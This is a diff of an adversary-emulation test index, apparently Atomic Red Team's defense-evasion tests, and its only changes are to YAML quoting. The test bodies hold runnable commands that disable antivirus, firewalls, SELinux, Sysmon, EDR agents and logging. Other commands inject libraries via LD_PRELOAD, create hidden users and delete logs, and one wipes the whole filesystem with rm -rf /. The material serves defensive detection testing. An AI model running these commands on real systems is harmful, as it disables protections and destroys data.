@@ defense-evasion: executor: command: 'hh.exe #{remote_chm_file} -' + ' name: command_prompt - name: Invoke CHM with default Shortcut Command Execution auto_generated_guid: 29d6f0d7-be63-4482-8827-ea77126c1ef7 @@ -23430,7 +23430,7 @@ defense-evasion: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force -' + ' executor: command: 'Invoke-ATHCompiledHelp -HHFilePath #{hh_file_path} -CHMFilePath #{chm_file_path}' @@ -23463,7 +23463,7 @@ defense-evasion: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force -' + ' executor: command: 'Invoke-ATHCompiledHelp -InfoTechStorageHandler #{infotech_storage_handler} -HHFilePath #{hh_file_path} -CHMFilePath #{chm_file_path}' @@ -23488,7 +23488,7 @@ defense-evasion: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force -' + ' executor: command: 'Invoke-ATHCompiledHelp -SimulateUserDoubleClick -CHMFilePath #{chm_file_path}' name: powershell @@ -23529,7 +23529,7 @@ defense-evasion: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force -' + ' executor: command: 'Invoke-ATHCompiledHelp -ScriptEngine #{script_engine} -InfoTechStorageHandler #{infotech_storage_handler} -TopicExtension #{topic_extension} -HHFilePath @@ -23568,7 +23568,7 @@ defense-evasion: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force -' + ' executor: command: 'Invoke-ATHCompiledHelp -ExecuteShortcutCommand -InfoTechStorageHandler #{infotech_storage_handler} -TopicExtension #{topic_extension} -HHFilePath @@ -23721,17 +23721,17 @@ defense-evasion: dependencies: - description: 'Cpl file must exist on disk at specified location (#{cpl_file_path}) -' + ' prereq_command: 'if (Test-Path #{cpl_file_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{cpl_file_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.002/bin/calc.cpl" -OutFile "#{cpl_file_path}" executor: command: 'control.exe #{cpl_file_path} -' + ' name: command_prompt T1578.002: technique: @@ -24082,10 +24082,10 @@ defense-evasion: dependencies: - description: 'Gup.exe binary must exist on disk at specified location (#{gup_executable}) -' + ' prereq_command: 'if (Test-Path #{gup_executable}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{gup_executable}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/bin/GUP.exe?raw=true" -OutFile "#{gup_executable}" @@ -24093,7 +24093,7 @@ defense-evasion: command: "#{gup_executable}\n" cleanup_command: 'taskkill /F /IM #{process_name} >nul 2>&1 -' + ' name: command_prompt T1078.001: technique: @@ -24213,7 +24213,7 @@ defense-evasion: description: 'The Adversaries can activate the default Guest user. The guest account is inactivated by default -' + ' supported_platforms: - windows input_arguments: @@ -24224,10 +24224,10 @@ defense-evasion: executor: command: 'net user #{guest_user} /active:yes -' + ' cleanup_command: 'net user #{guest_user} /active:no -' + ' name: command_prompt elevation_required: true T1578.003: @@ -24366,7 +24366,7 @@ defense-evasion: description: 'Rename certutil and decode a file. This is in reference to latest research by FireEye [here](https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html) -' + ' supported_platforms: - windows input_arguments: @@ -24389,7 +24389,7 @@ defense-evasion: description: 'Use Python to decode a base64-encoded text string and echo it to the console -' + ' supported_platforms: - linux - macos @@ -24405,13 +24405,13 @@ defense-evasion: dependencies: - description: 'Python must be present -' + ' prereq_command: 'which python3 -' + ' get_prereq_command: 'echo "Please install Python 3" -' + ' executor: name: sh elevation_required: false @@ -24428,7 +24428,7 @@ defense-evasion: description: 'Use Perl to decode a base64-encoded text string and echo it to the console -' + ' supported_platforms: - linux - macos @@ -24444,13 +24444,13 @@ defense-evasion: dependencies: - description: 'Perl must be present -' + ' prereq_command: 'which perl -' + ' get_prereq_command: 'echo "Please install Perl" -' + ' executor: name: sh elevation_required: false @@ -24464,7 +24464,7 @@ defense-evasion: description: 'Use common shell utilities to decode a base64-encoded text string and echo it to the console -' + ' supported_platforms: - linux - macos @@ -24495,7 +24495,7 @@ defense-evasion: description: 'Use common shell utilities to decode a hex-encoded text string and echo it to the console -' + ' supported_platforms: - linux - macos @@ -24511,13 +24511,13 @@ defense-evasion: dependencies: - description: 'xxd must be present -' + ' prereq_command: 'which xxd -' + ' get_prereq_command: 'echo "Please install xxd" -' + ' executor: name: sh elevation_required: false @@ -24750,7 +24750,7 @@ defense-evasion: description: 'Creates a new cloudTrail in AWS, Upon successful creation it will Update,Stop and Delete the cloudTrail -' + ' supported_platforms: - iaas:aws input_arguments: @@ -24769,7 +24769,7 @@ defense-evasion: dependencies: - description: 'Check if ~/.aws/credentials file has a default stanza is configured -' + ' prereq_command: | cat ~/.aws/credentials | grep "default" aws s3api create-bucket --bucket #{s3_bucket_name} --region #{region} @@ -24777,7 +24777,7 @@ defense-evasion: get_prereq_command: 'echo Please install the aws-cli and configure your AWS defult profile using: aws configure -' + ' executor: command: | aws cloudtrail create-trail --name #{cloudtrail_name} --s3-bucket-name #{s3_bucket_name} --region #{region} @@ -24884,7 +24884,7 @@ defense-evasion: command: 'C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:true -' + ' cleanup_command: | if(Test-Path "C:\Windows\System32\inetsrv\appcmd.exe"){ C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:false *>$null @@ -24959,10 +24959,10 @@ defense-evasion: executor: command: 'wevtutil sl "#{log_name}" /e:false -' + ' cleanup_command: 'wevtutil sl "#{log_name}" /e:true -' + ' name: command_prompt T1562.007: technique: @@ -25062,10 +25062,10 @@ defense-evasion: executor: command: 'netsh advfirewall set currentprofile state off -' + ' cleanup_command: 'netsh advfirewall set currentprofile state on >nul 2>&1 -' + ' name: command_prompt - name: Disable Microsoft Defender Firewall via Registry auto_generated_guid: afedc8c4-038c-4d82-b3e5-623a95f8a612 @@ -25078,11 +25078,11 @@ defense-evasion: command: 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile" /v "EnableFirewall" /t REG_DWORD /d 0 /f -' + ' cleanup_command: 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile" /v "EnableFirewall" /t REG_DWORD /d 1 /f -' + ' name: command_prompt - name: Allow SMB and RDP on Microsoft Defender Firewall auto_generated_guid: d9841bf8-f161-4c73-81e9-fd773a5ff8c1 @@ -25097,7 +25097,7 @@ defense-evasion: netsh advfirewall firewall set rule group="file and printer sharing" new enable=Yes cleanup_command: 'netsh advfirewall reset >nul 2>&1 -' + ' name: command_prompt - name: Opening ports for proxy - HARDRAIN auto_generated_guid: 15e57006-79dd-46df-9bf9-31bc24fb5a80 @@ -25156,27 +25156,27 @@ defense-evasion: auto_generated_guid: fe135572-edcd-49a2-afe6-1d39521c5a9a description: 'Stop the Uncomplicated Firewall (UFW) if installed. -' + ' supported_platforms: - linux dependency_executor_name: sh dependencies: - description: 'Check if ufw is installed on the machine. -' + ' prereq_command: "if [ ! -x \"$(command -v ufw)\" ]; then echo -e \"\\n***** ufw NOT installed *****\\n\"; exit 1; fi\nif echo \"$(ufw status)\" |grep -q \"inactive\"; then echo -e \"\\n***** ufw inactive *****\\n\"; exit 1; fi \n" get_prereq_command: 'echo "" -' + ' executor: name: sh elevation_required: true command: 'ufw disable -' + ' cleanup_command: | ufw enable ufw status verbose @@ -25190,7 +25190,7 @@ defense-evasion: dependencies: - description: 'Check if systemctl and ufw is installed on the machine. -' + ' prereq_command: "if [ ! -x \"$(command -v systemctl)\" ]; then echo -e \"\\n***** systemctl NOT installed *****\\n\"; exit 1; fi\nif [ ! -x \"$(command -v ufw)\" ]; then echo -e \"\\n***** ufw NOT installed *****\\n\"; exit 1; @@ -25198,13 +25198,13 @@ defense-evasion: ufw inactive *****\\n\"; exit 1; fi \n" get_prereq_command: 'echo "" -' + ' executor: name: sh elevation_required: true command: 'systemctl stop ufw -' + ' cleanup_command: | systemctl start ufw systemctl status ufw @@ -25217,20 +25217,20 @@ defense-evasion: dependencies: - description: 'Check if ufw is installed on the machine and enabled. -' + ' prereq_command: "if [ ! -x \"$(command -v ufw)\" ]; then echo -e \"\\n***** ufw NOT installed *****\\n\"; exit 1; fi\nif echo \"$(ufw status)\" |grep -q \"inactive\"; then echo -e \"\\n***** ufw inactive *****\\n\"; exit 1; fi \n" get_prereq_command: 'echo "" -' + ' executor: name: sh elevation_required: true command: 'ufw logging off -' + ' cleanup_command: | ufw logging low ufw status verbose @@ -25244,14 +25244,14 @@ defense-evasion: dependencies: - description: 'Check if ufw is installed on the machine and enabled. -' + ' prereq_command: "if [ ! -x \"$(command -v ufw)\" ]; then echo -e \"\\n***** ufw NOT installed *****\\n\"; exit 1; fi\nif echo \"$(ufw status)\" |grep -q \"inactive\"; then echo -e \"\\n***** ufw inactive *****\\n\"; exit 1; fi \n" get_prereq_command: 'echo "" -' + ' executor: name: sh elevation_required: true @@ -25265,21 +25265,21 @@ defense-evasion: auto_generated_guid: beaf815a-c883-4194-97e9-fdbbb2bbdd7c description: 'Edit the Uncomplicated Firewall (UFW) rules file /etc/ufw/user.rules. -' + ' supported_platforms: - linux dependency_executor_name: sh dependencies: - description: 'Check if /etc/ufw/user.rules exists. -' + ' prereq_command: 'if [ ! -f "/etc/ufw/user.rules" ]; then echo -e "\n***** ufw NOT installed *****\n"; exit 1; fi -' + ' get_prereq_command: 'echo "" -' + ' executor: name: sh elevation_required: true @@ -25288,7 +25288,7 @@ defense-evasion: grep "# THIS IS A COMMENT" /etc/ufw/user.rules cleanup_command: 'sed -i ''s/# THIS IS A COMMENT//g'' /etc/ufw/user.rules -' + ' - name: Edit UFW firewall ufw.conf file auto_generated_guid: c1d8c4eb-88da-4927-ae97-c7c25893803b description: "Edit the Uncomplicated Firewall (UFW) configuration file /etc/ufw/ufw.conf @@ -25299,14 +25299,14 @@ defense-evasion: dependencies: - description: 'Check if /etc/ufw/ufw.conf exists. -' + ' prereq_command: 'if [ ! -f "/etc/ufw/ufw.conf" ]; then echo -e "\n***** ufw NOT installed *****\n"; exit 1; fi -' + ' get_prereq_command: 'echo "" -' + ' executor: name: sh elevation_required: true @@ -25326,14 +25326,14 @@ defense-evasion: dependencies: - description: 'Check if /etc/ufw/sysctl.conf exists. -' + ' prereq_command: 'if [ ! -f "/etc/ufw/sysctl.conf" ]; then echo -e "\n***** ufw NOT installed *****\n"; exit 1; fi -' + ' get_prereq_command: 'echo "" -' + ' executor: name: sh elevation_required: true @@ -25353,14 +25353,14 @@ defense-evasion: dependencies: - description: 'Check if /etc/default/ufw exists. -' + ' prereq_command: 'if [ ! -f "/etc/default/ufw" ]; then echo -e "\n***** ufw NOT installed *****\n"; exit 1; fi -' + ' get_prereq_command: 'echo "" -' + ' executor: name: sh elevation_required: true @@ -25369,7 +25369,7 @@ defense-evasion: grep "# THIS IS A COMMENT" /etc/default/ufw cleanup_command: 'sed -i ''s/# THIS IS A COMMENT//g'' /etc/default/ufw -' + ' - name: Tail the UFW firewall log file auto_generated_guid: 419cca0c-fa52-4572-b0d7-bc7c6f388a27 description: "Print the last 10 lines of the Uncomplicated Firewall (UFW) log @@ -25380,20 +25380,20 @@ defense-evasion: dependencies: - description: 'Check if /var/log/ufw.log exists. -' + ' prereq_command: 'if [ ! -f "/var/log/ufw.log" ]; then echo -e "\n***** ufw NOT logging *****\n"; exit 1; fi -' + ' get_prereq_command: 'echo "" -' + ' executor: name: sh elevation_required: true command: 'tail /var/log/ufw.log -' + ' cleanup_command: '' T1562.001: technique: @@ -25458,7 +25458,7 @@ defense-evasion: auto_generated_guid: 4ce786f8-e601-44b5-bfae-9ebb15a7d1c8 description: 'Disables syslog collection -' + ' supported_platforms: - linux input_arguments: @@ -25487,11 +25487,11 @@ defense-evasion: dependencies: - description: 'Package with rsyslog must be on system -' + ' prereq_command: 'if #{package_checker} > /dev/null; then exit 0; else exit 1; fi -' + ' get_prereq_command: "sudo #{package_installer} \n" executor: command: "#{flavor_command}\n" @@ -25502,7 +25502,7 @@ defense-evasion: auto_generated_guid: ae8943f7-0f8d-44de-962d-fbc2e2f03eb8 description: 'Disable the Cb Response service -' + ' supported_platforms: - linux executor: @@ -25520,23 +25520,23 @@ defense-evasion: auto_generated_guid: fc225f36-9279-4c39-b3f9-5141ab74f8d8 description: 'Disables SELinux enforcement -' + ' supported_platforms: - linux executor: command: 'setenforce 0 -' + ' cleanup_command: 'setenforce 1 -' + ' name: sh elevation_required: true - name: Stop Crowdstrike Falcon on Linux auto_generated_guid: 828a1278-81cc-4802-96ab-188bf29ca77d description: 'Stop and disable Crowdstrike Falcon on Linux -' + ' supported_platforms: - linux executor: @@ -25552,7 +25552,7 @@ defense-evasion: auto_generated_guid: 8fba7766-2d11-4b4a-979a-1e3d9cc9a88c description: 'Disables Carbon Black Response -' + ' supported_platforms: - macos executor: @@ -25568,48 +25568,48 @@ defense-evasion: auto_generated_guid: 62155dd8-bb3d-4f32-b31c-6532ff3ac6a3 description: 'Disables LittleSnitch -' + ' supported_platforms: - macos executor: command: 'sudo launchctl unload /Library/LaunchDaemons/at.obdev.littlesnitchd.plist -' + ' cleanup_command: 'sudo launchctl load -w /Library/LaunchDaemons/at.obdev.littlesnitchd.plist -' + ' name: sh elevation_required: true - name: Disable OpenDNS Umbrella auto_generated_guid: 07f43b33-1e15-4e99-be70-bc094157c849 description: 'Disables OpenDNS Umbrella -' + ' supported_platforms: - macos executor: command: 'sudo launchctl unload /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist -' + ' cleanup_command: 'sudo launchctl load -w /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist -' + ' name: sh elevation_required: true - name: Disable macOS Gatekeeper auto_generated_guid: 2a821573-fb3f-4e71-92c3-daac7432f053 description: 'Disables macOS Gatekeeper -' + ' supported_platforms: - macos executor: command: 'sudo spctl --master-disable -' + ' cleanup_command: 'sudo spctl --master-enable -' + ' name: sh elevation_required: true - name: Stop and unload Crowdstrike Falcon on macOS @@ -25617,7 +25617,7 @@ defense-evasion: description: 'Stop and unload Crowdstrike Falcon daemons falcond and userdaemon on macOS -' + ' supported_platforms: - macos input_arguments: @@ -25655,40 +25655,40 @@ defense-evasion: dependencies: - description: 'Sysmon must be downloaded -' + ' prereq_command: 'if ((cmd.exe /c "where.exe Sysmon.exe 2> nul | findstr Sysmon 2> nul") -or (Test-Path $env:Temp\Sysmon\Sysmon.exe)) { exit 0 } else { exit 1 } -' + ' get_prereq_command: | Invoke-WebRequest "https://download.sysinternals.com/files/Sysmon.zip" -OutFile "$env:TEMP\Sysmon.zip" Expand-Archive $env:TEMP\Sysmon.zip $env:TEMP\Sysmon -Force Remove-Item $env:TEMP\Sysmon.zip -Force - description: 'sysmon must be Installed -' + ' prereq_command: 'if(sc.exe query sysmon | findstr sysmon) { exit 0 } else { exit 1 } -' + ' get_prereq_command: | if(cmd.exe /c "where.exe Sysmon.exe 2> nul | findstr Sysmon 2> nul") { C:\Windows\Sysmon.exe -accepteula -i } else { Set-Location $env:TEMP\Sysmon\; .\Sysmon.exe -accepteula -i} - description: 'sysmon filter must be loaded -' + ' prereq_command: 'if(fltmc.exe filters | findstr #{sysmon_driver}) { exit 0 } else { exit 1 } -' + ' get_prereq_command: | sysmon -u sysmon -accepteula -i executor: command: 'fltmc.exe unload #{sysmon_driver} -' + ' cleanup_command: | sysmon -u -i > nul 2>&1 sysmon -i -accepteula -i > nul 2>&1 @@ -25700,7 +25700,7 @@ defense-evasion: auto_generated_guid: a316fb2e-5344-470d-91c1-23e15c374edc description: 'Uninstall Sysinternals Sysmon for Defense Evasion -' + ' supported_platforms: - windows input_arguments: @@ -25713,10 +25713,10 @@ defense-evasion: dependencies: - description: 'Sysmon executable must be available -' + ' prereq_command: 'if(cmd /c where sysmon) {exit 0} else {exit 1} -' + ' get_prereq_command: | $parentpath = Split-Path "#{sysmon_exe}"; $zippath = "$parentpath\Sysmon.zip" New-Item -ItemType Directory $parentpath -Force | Out-Null @@ -25725,20 +25725,20 @@ defense-evasion: if(-not ($Env:Path).contains($parentpath)){$Env:Path += ";$parentpath"} - description: 'Sysmon must be installed -' + ' prereq_command: 'if(cmd /c sc query sysmon) { exit 0} else { exit 1} -' + ' get_prereq_command: 'cmd /c sysmon -i -accepteula -' + ' executor: command: 'sysmon -u -' + ' cleanup_command: 'sysmon -i -accepteula >nul 2>&1 -' + ' name: command_prompt elevation_required: true - name: AMSI Bypass - AMSI InitFailed @@ -25766,11 +25766,11 @@ defense-evasion: command: 'Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}" -Recurse -' + ' cleanup_command: 'New-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers" -Name "{2781761E-28E0-4109-99FE-B9D127C57AFE}" -ErrorAction Ignore | Out-Null -' + ' name: powershell elevation_required: true - name: Disable Arbitrary Security Windows Service @@ -25844,11 +25844,11 @@ defense-evasion: command: 'Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1 -' + ' cleanup_command: 'Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 0 -' + ' name: powershell elevation_required: true - name: Disable Microsoft Office Security Features @@ -25888,7 +25888,7 @@ defense-evasion: command: '"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All -' + ' name: command_prompt elevation_required: true - name: Stop and Remove Arbitrary Security Windows Service @@ -25898,7 +25898,7 @@ defense-evasion: The Remove-Service cmdlet removes a Windows service in the registry and in the service database. -' + ' supported_platforms: - windows input_arguments: @@ -25919,7 +25919,7 @@ defense-evasion: is located in a folder named with a random guid we need to identify it before invoking the uninstaller. -' + ' supported_platforms: - windows input_arguments: @@ -26006,23 +26006,23 @@ defense-evasion: description: 'Using the Disable-AntiPhishRule cmdlet to disable antiphish rules in your office-365 organization. -' + ' supported_platforms: - office-365 input_arguments: username: description: office-365 username type: String - default: + default: password: description: office-365 password type: String - default: + default: dependency_executor_name: powershell dependencies: - description: 'ExchangeOnlineManagement PowerShell module must be installed -' + ' prereq_command: | $RequiredModule = Get-Module -Name ExchangeOnlineManagement -ListAvailable if (-not $RequiredModule) {exit 1} @@ -26380,13 +26380,13 @@ defense-evasion: Provider to be federated must be configured (outside of the scope of this test). -' + ' prereq_command: 'if (Get-Module AzureADPreview) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Install-Module -Name AzureADPreview -Force -' + ' executor: command: | Import-Module AzureADPreview @@ -26700,21 +26700,21 @@ defense-evasion: - description: 'The shared library must exist on disk at specified location (#{path_to_shared_library}) -' + ' prereq_command: 'if [ -f #{path_to_shared_library ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source} -' + ' executor: command: 'sudo sh -c ''echo #{path_to_shared_library} > /etc/ld.so.preload'' -' + ' cleanup_command: 'sudo sed -i ''\~#{path_to_shared_library}~d'' /etc/ld.so.preload -' + ' name: bash elevation_required: true - name: Shared Library Injection via LD_PRELOAD @@ -26739,18 +26739,18 @@ defense-evasion: - description: 'The shared library must exist on disk at specified location (#{path_to_shared_library}) -' + ' prereq_command: 'if [ -f #{path_to_shared_library} ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source} -' + ' executor: command: 'LD_PRELOAD=#{path_to_shared_library} ls -' + ' name: bash T1055.001: technique: @@ -26850,10 +26850,10 @@ defense-evasion: dependencies: - description: 'Utility to inject must exist on disk at specified location (#{dll_payload}) -' + ' prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055.001/src/x64/T1055.001.dll" -OutFile "#{dll_payload}" @@ -27327,7 +27327,7 @@ defense-evasion: auto_generated_guid: 562d737f-2fc6-4b09-8c2a-7f8ff0828480 description: 'Delete a single file from the temporary directory -' + ' supported_platforms: - linux - macos @@ -27339,14 +27339,14 @@ defense-evasion: executor: command: 'rm -f #{file_to_delete} -' + ' name: sh - name: Delete an entire folder - Linux/macOS auto_generated_guid: a415f17e-ce8d-4ce2-a8b4-83b674e7017e description: 'Recursively delete the temporary directory and all files contained within it -' + ' supported_platforms: - linux - macos @@ -27358,14 +27358,14 @@ defense-evasion: executor: command: 'rm -rf #{folder_to_delete} -' + ' name: sh - name: Overwrite and delete a file with shred auto_generated_guid: '039b4b10-2900-404b-b67f-4b6d49aa6499' description: 'Use the `shred` command to overwrite the temporary file and then delete it -' + ' supported_platforms: - linux input_arguments: @@ -27376,7 +27376,7 @@ defense-evasion: executor: command: 'shred -u #{file_to_shred} -' + ' name: sh - name: Delete a single file - Windows cmd auto_generated_guid: 861ea0b4-708a-4d17-848d-186c9c7f17e3 @@ -27396,17 +27396,17 @@ defense-evasion: - description: 'The file to delete must exist on disk at specified location (#{file_to_delete}) -' + ' prereq_command: 'IF EXIST "#{file_to_delete}" ( EXIT 0 ) ELSE ( EXIT 1 ) -' + ' get_prereq_command: 'echo deleteme_T1551.004 >> #{file_to_delete} -' + ' executor: command: 'del /f #{file_to_delete} -' + ' name: command_prompt - name: Delete an entire folder - Windows cmd auto_generated_guid: ded937c4-2add-42f7-9c2c-c742b7a98698 @@ -27426,17 +27426,17 @@ defense-evasion: - description: 'The file to delete must exist on disk at specified location (#{folder_to_delete}) -' + ' prereq_command: 'IF EXIST "#{folder_to_delete}" ( EXIT 0 ) ELSE ( EXIT 1 ) -' + ' get_prereq_command: 'mkdir #{folder_to_delete} -' + ' executor: command: 'rmdir /s /q #{folder_to_delete} -' + ' name: command_prompt - name: Delete a single file - Windows PowerShell auto_generated_guid: 9dee89bd-9a98-4c4f-9e2d-4256690b0e72 @@ -27444,7 +27444,7 @@ defense-evasion: Upon execution, no output will be displayed. Use File Explorer to verify the file was deleted. -' + ' supported_platforms: - windows input_arguments: @@ -27458,17 +27458,17 @@ defense-evasion: - description: 'The file to delete must exist on disk at specified location (#{file_to_delete}) -' + ' prereq_command: 'if (Test-Path #{file_to_delete}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'New-Item -Path #{file_to_delete} | Out-Null -' + ' executor: command: 'Remove-Item -path #{file_to_delete} -' + ' name: powershell - name: Delete an entire folder - Windows PowerShell auto_generated_guid: edd779e4-a509-4cba-8dfa-a112543dbfb1 @@ -27476,7 +27476,7 @@ defense-evasion: Upon execution, no output will be displayed. Use File Explorer to verify the folder was deleted. -' + ' supported_platforms: - windows input_arguments: @@ -27490,18 +27490,18 @@ defense-evasion: - description: 'The folder to delete must exist on disk at specified location (#{folder_to_delete}) -' + ' prereq_command: 'if (Test-Path #{folder_to_delete}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'New-Item -Path #{folder_to_delete} -Type Directory | Out-Null -' + ' executor: command: 'Remove-Item -Path #{folder_to_delete} -Recurse -' + ' name: powershell - name: Delete Filesystem - Linux auto_generated_guid: f3aa95fe-4f10-4485-ad26-abf22a764c52 @@ -27509,13 +27509,13 @@ defense-evasion: This technique was used by Amnesia IoT malware to avoid analysis. This test is dangerous and destructive, do NOT use on production equipment. -' + ' supported_platforms: - linux executor: command: 'rm -rf / --no-preserve-root > /dev/null 2> /dev/null -' + ' name: bash - name: Delete Prefetch File auto_generated_guid: 36f96049-0ad7-4a5f-8418-460acaeb92fb @@ -27528,7 +27528,7 @@ defense-evasion: command: 'Remove-Item -Path (Join-Path "$Env:SystemRoot\prefetch\" (Get-ChildItem -Path "$Env:SystemRoot\prefetch\*.pf" -Name)[0]) -' + ' name: powershell elevation_required: true - name: Delete TeamViewer Log Files @@ -27552,18 +27552,18 @@ defense-evasion: - description: 'The folder to delete must exist on disk at specified location (#{teamviewer_log_file}) -' + ' prereq_command: 'if (Test-Path #{teamviewer_log_file}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'New-Item -Path #{teamviewer_log_file} | Out-Null -' + ' executor: command: 'Remove-Item #{teamviewer_log_file} -' + ' name: powershell T1222: technique: @@ -27708,7 +27708,7 @@ defense-evasion: auto_generated_guid: fb3d46c6-9480-4803-8d7d-ce676e1f1a9b description: 'Gatekeeper Bypass via command line -' + ' supported_platforms: - macos input_arguments: @@ -27719,7 +27719,7 @@ defense-evasion: executor: command: 'sudo xattr -d com.apple.quarantine #{app_path} -' + ' elevation_required: true name: sh T1484.001: @@ -27947,7 +27947,7 @@ defense-evasion: auto_generated_guid: 61a782e5-9a19-40b5-8ba4-69a4b9f3d7be description: 'Creates a hidden file inside a hidden directory -' + ' supported_platforms: - linux - macos @@ -27957,20 +27957,20 @@ defense-evasion: echo "T1564.001" > /var/tmp/.hidden-directory/.hidden-file cleanup_command: 'rm -rf /var/tmp/.hidden-directory/ -' + ' name: sh - name: Mac Hidden file auto_generated_guid: cddb9098-3b47-4e01-9d3b-6f5f323288a9 description: 'Hide a file on MacOS -' + ' supported_platforms: - macos executor: command: 'xattr -lr * / 2>&1 /dev/null | grep -C 2 "00 00 00 00 00 00 00 00 40 00 FF FF FF FF 00 00" -' + ' name: sh - name: Create Windows System File with Attrib auto_generated_guid: f70974c8-c094-4574-b542-2c545af95a32 @@ -27988,20 +27988,20 @@ defense-evasion: dependencies: - description: 'The file must exist on disk at specified location (#{file_to_modify}) -' + ' prereq_command: 'IF EXIST #{file_to_modify} ( EXIT 0 ) ELSE ( EXIT 1 ) -' + ' get_prereq_command: 'echo system_Attrib_T1564.001 >> #{file_to_modify} -' + ' executor: command: 'attrib.exe +s #{file_to_modify} -' + ' cleanup_command: 'del /A:S #{file_to_modify} >nul 2>&1 -' + ' name: command_prompt elevation_required: true - name: Create Windows Hidden File with Attrib @@ -28020,27 +28020,27 @@ defense-evasion: dependencies: - description: 'The file must exist on disk at specified location (#{file_to_modify}) -' + ' prereq_command: 'IF EXIST #{file_to_modify} ( EXIT 0 ) ELSE ( EXIT 1 ) -' + ' get_prereq_command: 'echo system_Attrib_T1564.001 >> #{file_to_modify} -' + ' executor: command: 'attrib.exe +h #{file_to_modify} -' + ' cleanup_command: 'del /A:H #{file_to_modify} >nul 2>&1 -' + ' name: command_prompt elevation_required: true - name: Hidden files auto_generated_guid: 3b7015f2-3144-4205-b799-b05580621379 description: 'Requires Apple Dev Tools -' + ' supported_platforms: - macos input_arguments: @@ -28051,13 +28051,13 @@ defense-evasion: executor: command: 'setfile -a V #{filename} -' + ' name: sh - name: Hide a Directory auto_generated_guid: b115ecaf-3b24-4ed2-aefe-2fcb9db913d3 description: 'Hide a directory on MacOS -' + ' supported_platforms: - macos executor: @@ -28066,22 +28066,22 @@ defense-evasion: chflags hidden /var/tmp/T1564.001_mac.txt cleanup_command: 'rm /var/tmp/T1564.001_mac.txt -' + ' name: sh - name: Show all hidden files auto_generated_guid: 9a1ec7da-b892-449f-ad68-67066d04380c description: 'Show all hidden files on MacOS -' + ' supported_platforms: - macos executor: command: 'defaults write com.apple.finder AppleShowAllFiles YES -' + ' cleanup_command: 'defaults write com.apple.finder AppleShowAllFiles NO -' + ' name: sh T1564.002: technique: @@ -28129,7 +28129,7 @@ defense-evasion: description: 'Add a hidden user on macOS using Unique ID < 500 (users with that ID are hidden by default) -' + ' supported_platforms: - macos input_arguments: @@ -28140,17 +28140,17 @@ defense-evasion: executor: command: 'sudo dscl . -create /Users/#{user_name} UniqueID 333 -' + ' cleanup_command: 'sudo dscl . -delete /Users/#{user_name} -' + ' elevation_required: true name: sh - name: Create Hidden User using IsHidden option auto_generated_guid: de87ed7b-52c3-43fd-9554-730f695e7f31 description: 'Add a hidden user on macOS using IsHidden optoin -' + ' supported_platforms: - macos input_arguments: @@ -28161,10 +28161,10 @@ defense-evasion: executor: command: 'sudo dscl . -create /Users/#{user_name} IsHidden 1 -' + ' cleanup_command: 'sudo dscl . -delete /Users/#{user_name} -' + ' elevation_required: true name: sh T1564.003: @@ -28246,7 +28246,7 @@ defense-evasion: executor: command: 'Start-Process #{powershell_command} -' + ' name: powershell T1564: technique: @@ -28330,7 +28330,7 @@ defense-evasion: dependencies: - description: 'Microsoft Word must be installed -' + ' prereq_command: | try { New-Object -COMObject "Word.Application" | Out-Null @@ -28340,7 +28340,7 @@ defense-evasion: get_prereq_command: 'Write-Host "You will need to install Microsoft Word manually to meet this requirement" -' + ' executor: command: | $macro = [System.IO.File]::ReadAllText("PathToAtomicsFolder\T1564\src\T1564-macrocode.txt") @@ -28350,7 +28350,7 @@ defense-evasion: Invoke-Maldoc -macroCode "$macro" -officeProduct "Word" -sub "Extract" -NoWrap cleanup_command: 'Remove-Item "$env:TEMP\extracted.exe" -ErrorAction Ignore -' + ' name: powershell - name: Create a Hidden User Called "$" auto_generated_guid: 2ec63cc2-4975-41a6-bf09-dffdfb610778 @@ -28525,7 +28525,7 @@ defense-evasion: auto_generated_guid: 4eafdb45-0f79-4d66-aa86-a3e2c08791f5 description: 'Disables history collection in shells -' + ' supported_platforms: - linux - macos @@ -28691,7 +28691,7 @@ defense-evasion: auto_generated_guid: 212cfbcf-4770-4980-bc21-303e37abd0e3 description: 'Emulates modification of auditd configuration files -' + ' 